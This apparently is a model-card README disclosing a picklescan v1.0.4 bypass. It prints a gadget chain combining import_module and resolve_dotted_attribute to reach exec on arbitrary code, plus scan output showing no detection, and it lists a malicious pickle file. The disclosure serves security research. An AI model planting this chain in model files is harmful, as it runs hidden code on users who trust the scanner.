Picklescan v1.0.4 Bypass PoC β€” MFV Submission

⚠️ SECURITY RESEARCH ONLY β€” DO NOT LOAD IN PRODUCTION

This repository contains a proof-of-concept demonstrating that picklescan v1.0.4 fails to detect a malicious pickle payload that achieves Arbitrary Code Execution (ACE).

Vulnerability

picklescan v1.0.4 does not classify importlib.import_module or xmlrpc.server.resolve_dotted_attribute as dangerous globals. A gadget chain combining these two functions achieves os.system() or exec() without triggering any dangerous classification.

Gadget Chain

xmlrpc.server.resolve_dotted_attribute(
    importlib.import_module('builtins'),
    'exec'
)(arbitrary_python_code)

Files

  • poc_model.pkl β€” Malicious pickle file (picklescan reports infected_files=0)
  • poc_picklescan_bypass.py β€” Full PoC script with 3 variants
  • create_hf_poc_model.py β€” Script to generate the PoC model

Scan Result

$ picklescan poc_model.pkl
infected_files: 0
issues_count: 0
globals: importlib.import_module [suspicious], xmlrpc.server.resolve_dotted_attribute [suspicious]

Affected Versions

  • picklescan <= 1.0.4

Impact

Any .pkl model file uploaded to HuggingFace Hub or other model registries can contain this payload. picklescan will report infected_files: 0, giving users false confidence that the file is safe. Loading the file with pickle.loads() or torch.load() (with weights_only=False) executes arbitrary code.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support